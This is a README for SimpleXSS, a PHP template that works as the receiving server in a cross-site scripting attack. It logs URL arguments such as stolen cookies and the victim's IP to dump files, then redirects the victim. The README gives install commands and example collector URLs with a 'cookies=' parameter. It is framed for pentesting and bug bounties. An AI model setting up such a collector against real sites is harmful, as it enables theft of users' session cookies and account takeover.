Simple index.php template to perform XSS attack.
- Record each URL args
- Record client IP
- Instant redirection (static or dynamic)
- Web server (apache2, nginx, ...)
- PHP
In this guide I'm using apache2 on Debian 9. Obviously, you can use every web server and distro you want.
1. Install apache2 and php
apt install apache2 php
2. Get the sources
git clone https://github.com/bambish/SimpleXSS
3. Move index.php in the web server root dir
mv SimpleXSS/index.php /var/www/html
4. Set the access right to write dump files
chown root:www-data /var/www/html
chmod g+w /var/www/html
- Basic usage: cookies=12345&arg=67890
http://127.0.0.1/index.php?cookies=12345&arg=67890
You can use every arbitrary args name
- Dynamic redirection: redirect=http://arbitrarywebsite.com/
http://127.0.0.1/index.php?cookies=12345&arbitraryarg=67890&redirect=http://github.com/
You can change or disable
the default redirection
by editing or comment $staticredirection
var in index.php
You can force the static redirection if you set $allowgetredirection
to false in index.php
- Write in specific dump file: dumpfile=arbitraryfile.txt
http://127.0.0.1/index.php?cookies=12345&arbitraryarg=67890&dumpfile=arbitraryfile.txt
Be shure your web server
have the right access to create and edit
files at the root dir
The default dump file is dumpfile.txt
docker run -dit --name XSS -v /path/to/host/web/root/dir/:/var/www/html/ --publish 80:80 fauria/lamp
Adapt the root dir path if you don't use apache2 and give write access to your docker container
This XSS template was created to perform pentest or others legal stuffs (like bug bounty). Using this XSS template against web site without authorization is forbidden.
I'm not responsible of your usage of this XSS template. At your own risk.